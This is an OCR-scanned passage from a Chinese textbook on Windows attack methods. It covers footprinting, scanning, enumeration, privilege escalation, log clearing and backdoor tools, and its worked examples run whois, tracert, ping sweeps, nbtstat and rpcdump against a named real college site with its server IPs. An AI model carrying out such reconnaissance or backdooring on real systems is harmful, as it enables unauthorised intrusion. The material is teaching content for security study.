全 后 门 的 困难 程度 。 这 部 分 主要 包括 入 侵 检测 日志 审计 及 防 病毒 安装 情况 。 


3. 查 点 


通过 扫描 ,和信 侵 者 掌握 了 目标 系统 所 使 用 的 操作 系统 ,下 一 个 工作 是 查 点 。 查 点 就 是 搜 
索 特定 系统 上 用 户 和 用 户 组 名 、 路 由 表 、SNMP 信息 .共享 资源 .服务 程序 及 旗 标 等 信息 。 
查 点 所 采用 的 技术 依 操作 系统 而 定 。 在 Windows 系统 上 主要 采用 的 技术 有 “ 查 点 
NetBIOS? 线 路 、 空 会 话 (null session), SNMP 代理 和 活动 目录 (active directory) 等 。 
Windows 系统 上 主要 有 以 下 工具 。 
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(D Windows 系统 命令 ,如 net view、nbtstat .nbtscan 和 nltest。 


(2) 第 三 方 软件 ,如 : 


Netviewx(www. ibt. ku. dx/jesper/NetViewx/default. htm) ; 
Userdunmp (www. hammerofgod. com/download. htm) ; 
User2sid(www. ntbugtraq. com); 

GetAcct (www. securityfriday.com); 

DunpSec ( www. somarsoft. com) ; 

Legion(www. legionlan. com) ; 

NAT( www. hackingexposed. com) . 


4. 获取 访问 权 


在 搜集 到 目标 系统 足够 信息 后 ,下 一 步 要 完成 的 工作 自然 是 得 到 目标 系统 的 访问 权 而 完 
成 对 目标 系统 的 人 侵 。 对 于 Windows 系统 采用 的 主要 技术 有 NetBIOS SMB 密码 猜测 (包括 
手工 及 字典 猜测 ) ,窃听 LM 及 NTLM 认证 散 列 、 攻 击 IIS Web 服务 器 及 远程 溢出 攻击 。 著 名 
的 密码 窃听 工具 有 sniffer pro, TCPdump, LC4 和 readsmb。 字 典 攻 击 工具 有 LC4, John the 
RIPper, NAT .SMBGrind。 对 于 访问 限制 的 服务 ,通过 暴力 破解 的 方式 获取 访问 权限 。 


5. 权限 提升 


一 旦 攻击 者 通过 前 面 4 步 获得 了 任意 普通 用 户 的 访问 权限 后 ,攻击 者 就 会 试图 将 普通 
用 户 权 限 提升 至 超级 用 户 权 限 , 以 便 完成 对 系统 的 完全 控制 。 这 种 从 低级 权限 开始 ,通过 各 
种 手段 得 到 较 高 权限 的 过 程 称 为 权限 提升 。 权 限 提升 所 采取 的 技术 主要 有 通过 得 到 的 密码 
文件 ,利用 现 有 工具 软件 ,破解 系统 上 其 他 用 户 名 及 口令 ; 利用 不 同 操作 系统 及 服务 的 漏洞 
(Windows 2003 NetDDE 漏洞 ) ,利用 管理 员 不 正确 的 系统 配置 等 。 常 用 的 口令 破解 工具 有 
John the RIPper, 得 到 Windows Server 2003 管理 员 权 限 的 工具 有 le message, getadmin, 
sechole,Invisible Keystroke Logger. 


6. 窃取 


一 且 攻 击 者 得 到 了 系统 的 完全 控制 权 , 接 下 来 将 完成 的 工作 是 窃取 , 即 进行 一 些 敏感 数 
据 的 算 改 、 添 加 删除 及 复制 (例如 Windows 系统 的 注册 表 )。 通 过 对 敏感 数据 的 分 析 ,为 进 
一 步 攻击 应 用 系统 做 准备 。 


7. 掩盖 踪迹 


黑客 并 非 踏 雪 无 痕 , 一 旦 黑客 人 侵 系 统 , 必 然 留 下 痕迹 。 此 时 ,黑客 需要 做 的 首要 工作 
就 是 清除 所 有 和 人 侵 痕 迹 , 避 免 自己 被 检测 出 来 ,以 便 能 够 随时 返回 被 人 侵 系 统 继续 干 坏事 或 
作为 入 侵 其 他 系统 的 中 级 跳板 。 掩 盖 踪 迹 的 主要 工作 有 禁止 系统 审计 、 清 空 事件 日 志 、 隐 藏 
作案 工具 及 使 用 人 们 称 为 rootkit 的 工具 组 替换 那些 常用 的 操作 系统 命令 。 常 用 的 清除 系 
统 日 志 工 具有 zap、wzap 和 wted。 


8. 创建 后 门 


黑客 的 最 后 一 招 便 是 在 受害 系统 上 创建 一 些 后门 及 陷阱 ,以 便 入 侵 者 一 时 兴起 时 , 卷 十 
重 来 ,并 能 以 特权 用 户 的 身份 整个 系统 。 创 建 后 门 的 主要 方法 有 创建 具有 特权 用 户 权限 的 
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虚假 用 户 账号 .安装 批 处 理 、 安 装 远程 控制 工具 、 使 用 木马 程序 替换 系统 程序 .安装 监控 机 制 
及 感染 启动 文件 等 。 黑 客 常用 的 工具 有 rootkit, sub7, cron, at, Windows 启动 文件 夹 、 
Netcat, VNC,BO2K ,secadmin Invisible Keystroke Logger „remove. exe 等 。 


9. 拒绝 服务 攻击 


如 果 黑 客 未 能 成 功 地 完成 第 四 步 的 获取 访问 权 , 那 么 他 们 所 能 采取 的 最 恶毒 的 手段 便 
是 进行 拒绝 服务 攻击 。 即 用 漏洞 代码 攻击 系统 ,使 目标 服务 器 资源 耗 尽 或 资源 过 载 ,以 致 没 
有 能 力 再 向 外 提供 服务 。 攻 击 所 采用 的 技术 主要 是 利用 协议 漏洞 及 不 同系 统 实现 的 漏洞 。 


6.2 基于 Windows 的 踩点 .扫描 、 查 点 


基于 攻击 的 9 个 基本 流程 ,本 节 详 细 闸 述 针对 Windows 的 踩点 ,扫描 、 查 点 。 
3.2.1 踩点 
1. 踩点 收集 的 信息 


攻击 者 使 用 工具 软件 ,逐步 收集 被 攻击 者 的 与 环境 有 关 信息 。 

。 因特网 信息 : 域名 、 网 络 地 址 范围 ; 经 因特网 可 达 的 系统 IP 地 址 ,系统 上 运行 的 
TCP 和 UDP 服务 ; 访问 控制 机 制 和 访问 控制 列表 ; 入 侵 检 测 系统 ; 系统 查 点 。 

。 内 联网 信息 : 内 联网 的 网 络 协议 是 IP 还 是 DecNet? 内 联网 的 内 部 域名 、 网 络 地 址 
块 ; 经 内 联网 可 达 的 系统 TP 地址 ,系统 上 运行 的 TCP 和 UDP 服务 ; 访问 控制 机 制 
和 访问 控制 列表 ; 入侵 检 测 系统 ; 系统 查 点 。 

。 外 联网 信息 : 外 联网 是 连接 源 地 址 还 是 目标 地 址 ; 连接 类 型 ; 访问 控制 机 制 等 。 

。 远程 访问 信息 : 数字 电话 号 码 、 远 程 系 统 类 型 .身份 验证 机 制 \.VPN 及 相关 协议 是 
IPSec 还 是 SSL。 


2. 踩点 技巧 


攻击 者 常用 的 踩点 技巧 有 以 下 几 种 。 

1) 网 页 搜寻 

通常 我 们 都 会 从 目标 所 在 的 主页 开始 搜寻 网 页 。 目 标 网 页 可 以 给 我 们 提供 大 量 的 有 用 
信息 ,甚至 某 些 与 安全 相关 的 配置 信息 。 

2) 争取 授权 

黑客 踩点 的 第 二 件 事 就 是 争取 获得 必要 的 授权 。 从 技术 角度 讲 ,TCP/IP 是 五 层 模型 ; 
但 从 信息 安全 的 角度 看 ,政治 因素 和 资金 因素 是 更 高 层次 。 踩 点 是 否 得 到 了 书面 授权 ? 授 
权 的 范围 和 内 容 是 什么 ? 授权 是 否 来 自 有 权 做 出 该 授权 的 部 门 ? 目标 TP 地 址 是 否 正确 ? 

3) 链接 搜索 

通过 互联 网 上 的 超级 搜索 引擎 来 获得 同 目标 系统 相关 的 信息 。 目 标 网 站 所 在 的 服务 器 可 
能 有 其 他 具有 弱点 的 网 站 ,通过 该 网 站 获得 与 目标 系统 相关 的 信息 ,可 以 进行 迁 回 人 侵 , 而 
且 可 以 发 现 某 些 隐 舍 的 信息 。 两 款 超 级 搜索 引擎 : www. dogpile. com, www. hotbot. com, 


利 


利用 
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用 www. dogpile. com 的 whois 查询 ,搜索 www. hacz. edu. cn. 显示 结果 如 图 3-3 所 示 ; 
www. hotbot. com 的 whois 查询 ,搜索 “河南 财 专 ”, 显 示 结 果 如 图 3-4 所 示 。 


www.hacr.edu.cn - Dogpile Web Search - Nozilla Firefox 
XQ (mp EEV HO SED IAV 帮助 中 
e£? JILTESEBFSEITTAETTSETEB 


J wrw. hacz edu cn - Dogpile Heb Search 


, EE D De e T] 
dógpile Go Fut 


Googe Yewo! bng ch Preferences 


Web Search Results for "www.hacz.edu.cn" (454 Resuits) 


CEIBS 2012 EMBA Programme Are you looking for? 


China Depth Global Breadth. Learning with your intemational classmates 
ceibs.edw/EMBA/ 


C'NC Costume National 
New Spring Summer 11 Coll tion &F Il Winter Sale: Up to 50% OT 
www costumenational con/CN 


Haczów 
Gmina Haczów 


Recent Searches Hoe 
hacz.edu.cn 


mmt gen 


WWW. hacz edu. cn/ «Found on: Ge 


Hacz edu cn 

Hacz edu cn Smartviper Statistics Mashups. 大 学 生 ,河南 省 , 中 国 大 学 related sites 
Advanced keyword suggestions. Last updated on February 5 2011 

www. markosweb.com/www/hacz edu. cn/ » Found or Yahoo! Sesrch, Bing. 
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用 户 名 ; 

jwgl hacz edu. cn/ = Found orc Yahoo! Search, Bng 

河南 财政 税务 高 等 专科 学 校 招生 信息 

考生 指南 vr REIR, RENAE, 宣传 部 , 组 织 部 , 纪检 委 , 工会 ,团委 家 行政 机 
Hk REHAR, 教务 处 , 人 事 处 ,学 生 处 , 财务 处 , 总务 处 , 保卫 处 ,图 书馆 


Www hacz.edu.cn/ssc/zhaosheng/ * Found exclusively orr Googe 


TT 


图 3-3. 搜索 河南 财 专 相关 的 网 站 信息 


HotBot Web Search for 河南 财 专 - Hozilla Firefor DER 


Xt) KEV SEV HLO HEW IAV Mhu 


€» C| h Xo XIII ? A 
Ott Search tr UE E - 
^| 


| 河南 财 专 Advanced Search 
> | “ee er Dr] Ce 


CUSTOM WEB FILTERS: No fiters selected. HotBot Skins | Preferences. 


Sponsored Links 


Jim Cramer's Stock Picks - www. TheStreet,com 
See what stock Cramer is trading for his charitable trust and why. 


2011 Stock Forecast - www,taipanpublishinggroup.com 4 
Our Experts! Top 5 Investment Picks For This Year 


Trading Performance - www.cta-online,com 
See performance reports on over 700 professional traders 


Mortgage Rates Hit 2.9996 - www.SeeRefinanceRates.com 
If you owe less than $729k you probably qualify for govt Refi Programs 
WEB RESULTS ; 


by YAHOO! SEARCH 3 
i 财 专 主页 


河南 财 专 地址 ;河南 省 中 件 白沙 镇 郑 开 大 道 邮编 : 450002 


www.hacz.edu.cn 


2 河南 财政 税务 高 等 专科 学 校 
现代 教育 技术 中 心 制作 维护 Ricpã05002498$ 地 址 :河南 省 中 件 白 沙 镇 郑 开 大 道 部 编 :450002 流量 监测 


www2.hacz.edu.cn 


3 河南 财 专 图 书馆 -- 首 页 
ee a 图 书馆 完成 《河南 对 专 2006 年 度 工作 妥 点 分 解 } 工 ,., 关于 图 书馆 为 孝 职 


www.hacz.edu.cn 


4 河南 财政 税务 高 等 专科 学 校 _ 百 度 百科 
全 二 ”整个 图 案 恰 似 一 只 最 强 坎 飞 的 青春 鸟 。 充 分 体现 了 河南 财 专 全 体 师 生 团结 、 奋 斗 的 精神 ， 以 及 强烈 的 荣誉 感 和 自 训 感 1 
baike.baidu.com 


对 


3-4 关键 字 河 南 财 专 的 搜索 结果 
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获取 河南 财 专 的 信息 ,网 站 服务 器 IP 为 210. 42. 224. 11; 邮件 服务 器 IP 为 210. 42. 224. 9; 
教务 管理 系统 IP 为 210. 42. 224. 51; 电话 号 码 ; 到 其 他 Web 服务 器 的 链接 等 。 
获取 信息 的 目的 : 有 可 能 发 掘 漏洞 。 


3. 勘察 网 络 


勘察 网 络 是 黑客 确定 目标 网 络 的 拓扑 及 进入 网 络 内 部 的 潜在 访问 通道 。 在 Windows 
上 有 一 个 tracert 程序 ,该 程序 利用 IP 分 组 中 的 存活 时 间 (time to live,TTL) 字 段 从 途经 的 
每 台 路 由 器 发 出 一 条 ICMP 超时 消息 (TIME_EXCEEDED)。 处 理 该 分 组 的 每 台 路 由 器 应 
该 将 TTL 字段 减 1。 我 们 利用 这 一 功能 确定 分 组 途径 的 准确 路 径 。 它 除了 确认 基于 应 用 程 
序 的 防火 墙 或 分 组 过 滤 路 由 器 外 ,还 探索 目标 网 络 采用 的 网 络 拓扑 。 运 行 tracert 程序 的 计算 
机 IP 是 192. 168. 1. 100, 利 用 tracert 探测 到 达 www. hacz. edu. cn 的 路 径 信息 ,如 图 3-5 
所 示 。 


运 


IC: Ytracert www.hacz.edu.cn 


Tracing route to wuw.h du.cn [218.42.224.11] 
lover a naxinun of 38 hi 


192.168.1.108 
1.193.56.1 
EU 222. broad.zz .ha.dynanic .163data.con.cn| 


s 161.123.85.222.broad ha. dynanic.163data.con.c 


s 282.97.48.201 
282.97.35.69 
202.97.50.174 
Request timed out. 
282.127.216 .201 
282.112.36.253 


bjuh4.cernet.net [202.112.46.65] 
282.112.61.58 
s 282.112.38.30 
218.43.146.37 
218.43.145.242 


tined out. 
tined out. 

timed out. 

timed out. 

timed out. 

tined out. 

timed out. 

timed out. 

timed out. 

ined out. 

Request timed out. 


图 3-5 利用 tracert 探测 到 达 www. hacz. edu. cn 的 路 径 信息 


SamSpade 是 一 款 运 行 在 Windows 平台 的 集成 工具 箱 软件 ,用 于 大 量 的 网 络 探测 .网络 
管理 和 与 安全 有 关 的 任务 ,包括 ping, nslookup, whois, dig, traceroute, finger, raw HTTP 
web browser, DNS zone transfer, SMTP relay check website search 等 工具 。 运 行 SamSpade 的 


计算 机 IP 是 192. 168. 1. 100 ,利用 SamSpade 的 trace 功能 探测 到 达 www. hacz. edu. cn 的 路 径 
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信息 ,如 图 3-6 所 示 。 


È Spade - [Fast traceroute www.hacz.edu.cn, finished] 


S Hile Edit Vies Yindo Basics Tools Help 


.hacz.edu.cn s|9 90 | @fwhois.geekools.com ~| ET 


v 


EEJ 
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H 


$ 


e 
wi 
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® 
& 
n 
* 
* 
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04/09/11 09:18:58 Fast traceroute www.hacz.edu.cn 
Trace www.hacz.edu.cn (210.42.224.11) ... 

1 192.168.1.100 Üns Üns Üms TTL: (pending) 
21ns 22ms 7ü0ms TTL: (pending) 
21ms  21ms  24ms TTL: (pending) 
24ms  24ms  24ms TTL: (pending) 
42ns 44ms 43ms TTL: (pending) 
60ms 60ms 60ms TTL: (pending) 
57ns 57ns 58ms TTL: (pending) 


.216.201 220ms 218ms 217ms TTL: (pending) 
77ms  77ms 75ms TTL: (pending) 
78ms  76ms  76ms TTL: (pending) 
B6ns 80ns 8ims TTL: (pending) 

73ms — 75ms 74ms TTL: (pending) 

* 76ms TTL: (pending) 
75ms  77ms 76ms TTL: (pending) 
81ns 81ns 82ms TTL: (pending) 
76ms — 77nms * TTL: (pending) 
91ns  91ns  91ns TTL: (pending) 


Ao wew. kacz. edu. en 


[For Help, press FI 


3. 


图 3-6 利用 SamSpade 探测 到 达 www. hacz. edu. cn 的 路 径 信息 


2.2 扫描 


网 络 踩点 收集 网 络 用 户 名 LIP 地 址 范围 .DNS 服务 器 以 及 邮件 服务 器 等 有 价值 信息 。 
网 络 扫描 将 确定 哪些 系统 在 活动 ,并 能 从 因特网 上 访问 到 。 


3. 


确定 系统 是 否 在 活动 


早期 的 Ping 用 于 向 某 个 目标 系统 发 送 ICMP 回 送 请 求 (echo request) 分 组 (ICMP 类 型 


39. 
规模 的 


期 待 目 标 系统 返回 ICMP 回 送 应 答 (echo reply) 分 组 (ICMP 类 型 为 0) 。 对 于 中 小 


网 络 , 利 用 这 种 方法 来 确定 系统 是 否 在 活动 ,是 可 行 的 。 但 对 于 大 规模 网 络 Ping 的 


方法 就 显得 效率 低下 。 


在 


Windows 系统 中 ,有 许多 可 以 用 来 进行 ICMP Ping 扫描 的 工具 ,其 中 Fping 是 以 并 


行 的 轮 询 形式 发 出 的 大 量 的 Ping 请 求 。Fping 工具 有 两 种 用 法 : 一 种 是 通过 标准 输入 设备 
(stdin) 向 它 提供 一 系列 IP 地 址 ; 另 一 种 是 从 文件 中 读 取 。 每 行 放 一 个 IP 地 址 ,组 成 一 个 
文件 abc. txt ,格式 如 下 ; 


192.168.26.1 
192.168.26.2 


192.168. 26.253 
192.168.26.254 
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然后 ,使 用 -HH7 参 数 读 和 人 文件: 


C:>fping - Habc.txt 

Fast pinger version 2.22 

(c) Wouter Dhondt (http://www. kwakkelflap.com) 

Pinging multiple hosts with 32 bytes of data every 1000 ms: 
Reply[1] from 192.168.26.1: bytes = 32 time = 0.5 ns TTL = 64 
Reply[2] from 192.168.26.2: bytes = 32 time = 0.5 ns TTL = 64 


Reply[253] from 192.168.26.253: bytes = 32 time = 0.5 ns TTL = 64 

Reply[254] from 192.168.26.254: bytes = 32 time = 0.5 ns TTL = 64 

Ping statistics for multiple hosts: 

Packets:Sent = 254,Received = 127,Lost = 127 0105091055)( 机 器 活动 数量 127 台 , 未 启动 数量 

127 台 ) 

Approximate round trip times in milli- seconds: 

Minimum = 0.2 ms, Maximum = 0.5 ms,Average = 0.3 ms 

Fping 有 许多 选项 ,不 再 一 一 列举 。 对 Windows 系统 而 言 ,美国 Foundstone 公司 开发 
的 SuperScan 软件 的 速度 是 最 快 的 。 与 Fping 类 似 ,SuperScan 在 同时 发 出 多 个 ICMP 回 送 
请 求 分 组 后 等 待 并 监听 目标 主机 的 响应 , 它 也 允许 把 解析 出 的 主机 名 存放 在 HTML x 
件 中 。 


2. 确定 哪些 服务 正 处 于 监听 状态 


确定 当前 监听 的 端口 ,对 于 确定 所 用 的 操作 系统 和 应 用 程序 的 类 型 至 关 重要 。 因 此 ,对 
目标 系统 的 TCP 和 UDP 端口 进行 连接 ,以 达到 了 解 该 系统 正在 运行 哪些 服务 的 过 程 就 称 
为 端口 扫描 。 

1) 端口 扫描 技术 

最 近 几 年 ,端口 扫描 技术 和 扫描 工具 有 很 大 的 发 展 。 大 多 数 工 具 提供 基本 的 TCP 和 
UDP 扫描 能 力 ,并 集成 多 种 扫描 技术 ,下 面 介绍 几 种 常用 端口 扫描 技术 。 

(1) TCP Connect 扫描 。 该 扫描 是 调用 套 接口 函数 connect() 连 接 目 标 端口 ,完成 一 次 
完整 的 三 次 握手 过 程 。 客 户 发 送 一 个 SYN 分 组 给 服务 器 ; 服务 器 发 出 SYN/ACK 分 组 给 
客户 ; 客户 再 发 送 一 个 ACK 分 组 给 服务 器 。 

(2) TCP SYN 扫描 。 该 技术 又 称 为 半 打 开 扫 描 (Half-Open Scanning) ,没有 建立 完全 
的 TCP 连接。 扫描 主机 向 目标 端口 发 送 一 个 SYN 分 组 ,如 能 收 到 来 自 目标 端口 的 SYN/ 
ACK 分 组 , 则 可 推断 该 端口 处 于 监听 状态 。 如 果 收 到 的 是 一 个 RST/ACK 分 组 , 则 说 明 该 
端口 未 被 监听 。 执 行 端口 扫描 的 系统 随后 发 出 RST/ACK 分 组 ,这 样 并 未 建立 任何 “ 连 
JEU. 显然, 该 方法 比较 隐秘 ,不 易 被 目标 系统 检测 到 。 但 是 ,如 打开 的 半 开 连接 数量 过 多 
时 ,会 在 目标 主机 上 形成 “拒绝 服务 ”而 引起 对 方 的 警觉 。 

(3) TCP ACK 扫描 。 该 技术 用 于 探测 防火 墙 的 规则 集 。 它 可 以 确定 防火 墙 是 否 只 是 
简单 地 分 组 过 滤 、 只 允许 已 建 好 的 连接 (设置 ACK 位 ); 还 是 一 个 基于 状态 的 ,可 执行 高 级 
的 分 组 过 滤 防 火 墙 。 

(4) TCP NULL 扫描 。 该 技术 是 关 掉 所 有 的 标志 。 根 据 RFC 793 文档 规定 ,如 目标 端 
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口 是 关 闭 的 ,目标 主机 应 该 返回 RST 分 组 。 

(5) TCP SYN/ACK 扫描 。 该 技术 故意 忽略 TCP 的 三 次 握手 。 原 来 正常 的 TCP 连接 
可 以 化 简 为 SYN-SYN/ACK-ACK 形式 的 三 次 握手 来 进行 。 这 里 ,扫描 主机 不 向 目标 主机 
AE SYN 数据 包 ,而 先 发 送 SYN/ACK 数据 包 。 目 标 主机 将 报错 ,并 判断 为 一 次 错误 的 连 
接 。 若 目标 端口 开放 ,目标 主机 将 返回 RST 信息 。 

(6) UDP 扫描 。 该 技术 是 往 目标 端口 发 送 一 个 UDP 分 组 。 如 果 目 标 端 口 发 回 *ICMP 
port unreachable” 作 为 响应 , 则 表示 该 端口 是 关闭 的 ; 否则 该 端口 是 打开 的 。 由 于 UDP 是 
无 连接 的 .不 可 靠 的 协议 ,因此 上 述 结果 仅 有 参考 价值 。 

2) 端口 扫描 工具 

下 面 介绍 两 款 流行 的 且 经 过 时 间 考验 的 基于 Windows 的 端口 扫描 工具 。 

(1) SuperScan, 目 前 速度 最 快 . 适 应 面 广 的 Windows 端口 扫描 工具 之 一 ,既是 一 款 黑 
客 工具 ,又 是 一 款 网 络 安全 工具 。 黑 客 利 用 它 的 拒绝 服务 攻击 (denial of service,DoS) 收 集 
远程 网 络 主机 信息 。 作 为 安全 工具 ,SuperScan 能 够 帮助 你 发 现 网 络 中 的 弱点 。 它 可 以 用 
来 进行 Ping Hfi, TCP 端口 扫描 \UDP 端口 扫描 ,还 可 以 组 合 多 种 技术 同时 进行 扫描 。 

(2) advanced port scanner, 是 一 种 形式 简洁 ,扫描 迅速 以 及 易于 使 用 的 端口 扫描 器 ,可 
以 进行 多 线程 扫描 。 这 种 端口 扫描 器 为 一 般 端 口 列 出 详情 ,可 以 在 扫描 前 预先 设置 扫描 的 
端口 范围 或 者 是 基于 常用 端口 列表 ,扫描 结果 以 图 的 形式 显示 出 来 。 

3) 端口 扫描 检测 程序 

在 Windows 平台 上 ,由 Independent Software 公司 编写 的 Genius 2. 0 软件 可 以 用 来 监 
测 简单 的 端口 扫描 活动 (可 以 从 www. indiesoft. com 下 载 ), 这 个 工具 适用 于 Windows 
2000/2003, Genius 会 在 一 段 给 定时 间 内 同时 监听 大 量 的 端口 打开 请 求 , 当 它 监测 到 一 次 
扫描 时 ,就 会 弹出 一 个 窗口 向 你 报告 来 犯 者 的 IP 地 址 和 DNS 主机 名 。 


3. 确定 被 扫描 系统 的 操作 系统 类 型 


要 确定 一 个 系统 的 操作 系统 类 型 有 两 个 方法 : 一 个 是 主动 协议 栈 指纹 鉴别 , 另 一 个 是 
被 动 协议 栈 指纹 鉴别 。 由 于 TCP/IP 协议 栈 只 是 在 RFC 文档 中 描述 ,并 没有 一 个 统一 的 行 
业 标 准 ,各 个 公司 在 编写 应 用 于 自己 操作 系统 的 TCP/IP 协议 栈 时 ,对 RFC 文档 做 出 了 不 
尽 相 同 的 诠释 ,于 是 造成 了 各 个 操作 系统 在 TCP/IP 协议 栈 的 实现 上 不 同 。 

协议 栈 指纹 鉴别 (stack fingerprinting) 是 指 不 同 厂家 的 TCP/IP 协议 栈 实 现 之 间 存 在 
细微 差别 ,通过 探测 这 些 差异 ,能够 对 目标 系统 所 用 的 操作 系统 进行 比较 准确 的 判别 。 

1) 主动 协议 栈 指 纹 鉴 别 

主动 协议 栈 指纹 鉴别 包括 以 下 方法 。 

(1) FIN 探测 分 组 。 发 送 一 个 只 有 FIN 标志 位 的 TCP 数据 包 给 一 个 打开 的 端口 ， 
Windows 发 回 一 个 FIN/ACK 分 组 。 

(2) ACK 序号 。 发 送 一 个 FIN/PSH/URG 数据 包 到 一 个 关闭 的 TCP 端口 , Windows 
发 回 序号 为 初始 序号 加 1 的 ACK 包 。 

(3) 虚假 标记 的 SYN 包 。 在 SYN 包 的 TCP 首部 设置 一 个 准确 定义 的 TCP 标记 ， 
Windows 系统 在 响应 字 节 中 ,不 设置 该 标记 ,而 是 会 复位 连接 。 

(D ISN( 初 始 化 序列 号 )。 在 响应 一 个 连接 请 求 时 ,Windows 系统 选择 TCP ISN 时 采 
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用 一 种 时 间 相 关 的 模型 。 

(5) TOS( 服 务 类 型 )。 对 于 ICMP 端口 不 可 达 消 息 , Windows 送 回 包 的 值 为 0。 

(6) 主机 使 用 的 端口 。Windows 会 开放 一 些 特殊 的 端口 ,比如 137,139 和 445. 

2) 被 动 协议 栈 指纹 鉴别 

主动 协议 栈 指纹 识别 需要 主动 往 目标 发 送 数据 包 , 往 往 容易 被 IDS 捕获 。 为 了 隐秘 地 
识别 远程 操作 系统 ,就 需要 使 用 被 动 协议 栈 指纹 识别 。 被 动 协议 栈 指 纹 识别 在 原理 上 和 主 
动 协议 栈 指纹 识别 相似 ,但 是 它 不 主动 发 送 数据 包 , 只 是 被 动 地 捕获 远程 主机 返回 的 包 , 分 
析 其 操作 系统 类 型 或 版 本 。 

在 TCP/IP 会 话 中 ,有 三 个 基本 属性 对 识别 操作 系统 有 用 ,如 下 。 

* TTL = 128TTL ,表示 存活 期 time-to-live。 

* Windows Size( 窗 口 大 小 )=0x402e。 

* Don't Fragment 位 (CDF) 王 0( 分 片 ) 。 

被 动 分 析 这 些 属性 ,符合 上 述 结果 , 则 远程 操作 系统 类 型 为 Windows, 

NMapWin 是 一 个 跨 平 台 的 端口 扫描 工具 , 它 提 供给 管理 员 扫描 整个 网 络 的 能 力 , 并 发 
现 网 络 的 安全 弱点 所 在 。 图 3-7 中 ,NMap Win 扫描 到 了 Windows 特殊 端口 137, 因 此 远程 
操作 系统 为 Windows。 


3-7 NMapWin 扫描 远程 操作 系统 


3.2.8 查 点 


如 果 目 标 探测 和 勘察 网 络 收获 不 大 ,攻击 者 就 会 确定 有 效 的 用 户 账号 或 保护 不 当 的 共 
享 资源 。 从 系统 中 抽出 有 效 账 号 或 导出 资源 名 的 过 程 就 称 为 查 点 (enumeration) 。 
查 点 涉及 去 往 目标 系统 的 主动 连接 和 定向 查询 。 它 与 具体 操作 系统 密切 相关 , 且 攻 击 
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的 重点 在 于 网 络 资源 和 共享 资源 ,用户 和 用 户 组 、 服 务 程序 及 其 旗 标 。 
1. 旗 标 抓 取 基础 


旗 标 抓 取 是 查 点 技术 的 基础 ,可 以 定义 为 连接 到 远程 应 用 程序 并 观察 它 的 输出 。 攻 击 
者 可 以 识别 目标 系统 上 运行 的 各 项 服务 工作 模型 ,以 便 对 其 潜在 弱点 展开 研究 。 一 般 情况 
下 ,建立 一 条 到 目标 服务 器 某 已 知 端口 的 Telnet 连接 ,多 按 几 次 Enter 键 ,就 有 可 能 得 到 如 
下 的 返回 信息 ， 


C:/» telnet www. corleone. com 80 

HTTP/1.0 400 Bad Request 

Server : Netscape - connerce/1.12 

Your browser sent a non - HTTP conplaint message 


由 此 可 见 , Telnet 技术 用 于 监听 标准 端口 (http/80 smtp/25 ,ftp/21) 的 应 用 服务 。 
2. 常用 网 络 服务 查 点 

1) FTP 查 点 

C:/> telnet 192.168.1.250 25 

2) SMTP 查 点 

C:/» telnet 192.168.1.250 25 

3) NetBOIS NAME SERVICE 查 点 


C:V» NET VIEW /DOMAIN( 查 询 域 ) 


Domain 
MSHOME 
WORKGROUP 
命令 成 功 完成 。 
网 络 截 包 如 图 3-8 所 示 。 
Source [Destination Protocol Length (Info 


10.0.0.57 10.0.0.255 BROWSER 216 Get Backup List Request 
10.0.0.92  10.0.0.57 BROWSER 227 Get Backup List Response 


图 3-8 NET VIEW 查 点 工具 (1) 


再 查询 某 个 域 中 的 服务 器 : 


C: V» NET VIEW /domain:MSHOME 
服务 器 名 称 ”注释 


AMISHOME- WDB 1111 


命令 成 功 完成 。 
网 络 截 包 如 图 3-9 所 示 。 
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Session request, to L3-3c1-w08«20» from [ — )-0%-1309<00> 
Positive session response 

Negotiate Protocol Request 

Negotiate Protocol Response 

Session setup Andx Request, NTLMSSP_NEGOTIATE 

Session Setup Andx Response, NTLMSSP.CHALLENGE, Error: STATUS.MORE. PROCESSING REQUIRED 

Session setup Andx Request, NTLMSSP AUTH, User: V 

Session setup Andx Response 

Tree Connect Andx Request, Path: \NL-ICJ-wDSNIPCS 

Tree Connect Andx Response 

NecServerEnum2 Request, Workstation, Server, SQL server, Domain controller, Backup Controller, Time source, 
Netserverenum? Response 

Logoff Andx request 

Logoff Andx response 

Tree Disconnect request 

Tree Disconnect Response 


10.0.0.57 10.0.0.92 TCP netdo-expart > netbios-ssn [ACK] Seq=984 Ack=758 win=64779 Len=0 


图 3-9 NET VIEW 查 点 工具 (2) 


4) NBTSTAT 查 点 
Windows 第 二 个 查 点 工具 NBTSTAT ,能够 调 


某 个 远程 系统 的 NetBOIS 清单 。 


C:\>nbtstat -A 10.0.0.57 

Node IpAddress:[10. 0.0.57] Scope Id:[] 

NetBIOS Remote Machine Nane Table 

Name Type Status 

MSHOME - XXK - 1309 <00> UNIQUE Registered 
MSHOME - XXK - 1309 «20» UNIQUE Registered 


MSHOME — XXK <00> GROUP Registered 
MSHOME — XXK <1E> GROUP Registered 
MSHOME — XXK <1D> UNIQUE Registered 


.. .MSBROWSE .. <01> GROUP Registered 
MAC Address = B8- AC- 6F- 3E- 3E - 85 


能 查 出 计算 机 名 、MAC 地 址 .所 在 域名 \ 已 登录 的 用 户 (03)、 正 在 运行 的 服务 (1C) 等 信息 。 

5) MSRPC 端点 映射 器 查 点 

MSRPC(Microsoft Remote Procedure Call) 的 端点 映射 器 (end point mapper) 运行 在 
TCP 135 端口 上 。 查 询 该 服务 可 以 获得 目标 主机 上 的 应 用 程序 和 相关 信息 。 


C:>Rpcdump /s /v /i 

ProtSeq:ncacn ip tcp 

Endpoint:1025 

NetOpt: 

Annotation:MS NT Directory DRS Interface 
IsListening:YES 

StringBinding:ncacn ip tcp:65.53.63.15[1025] 
UUID:e3514235 - 4b06 - 11d1 - ab04 - 00c04fc2dcd2 
ComTimeOutValue:RPC C BINDING DEFAULT TIMEOUT 
VersMajor 4 VersMinor 0 


6.3 基于 Windows 的 远程 攻击 


基于 攻击 的 9 个 基本 流程 ,本 节 详细 阅 述 针对 Windows 的 获取 访问 权 、` 权 限 提升 、 窃 
取 、 掩 盖 踪 迹 和 创建 后 门 。 
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3.3.1 获取 访问 权 


Windows 独 有 的 组 网 协议 和 服务 。 这 些 协 议和 服务 包括 服务 器 信息 块 (SMB) V flt 
软 远程 过 程 调用 (MSRPC) 和 NetBIOS 的 相关 服务 , 如 NetBIOS 会 话 服 务 、 
NetBIOS 名 字 解 析 服 务 等 。 通 过 这 些 程 序 提供 的 应 用 程序 编程 接口 (API) 可 以 访 
问 远程 的 Windows 系统 。 

各 种 因特网 服务 在 Windows 中 的 实现 。 大 家 熟悉 的 TCP/IP 协议 ,如 HTTP、 
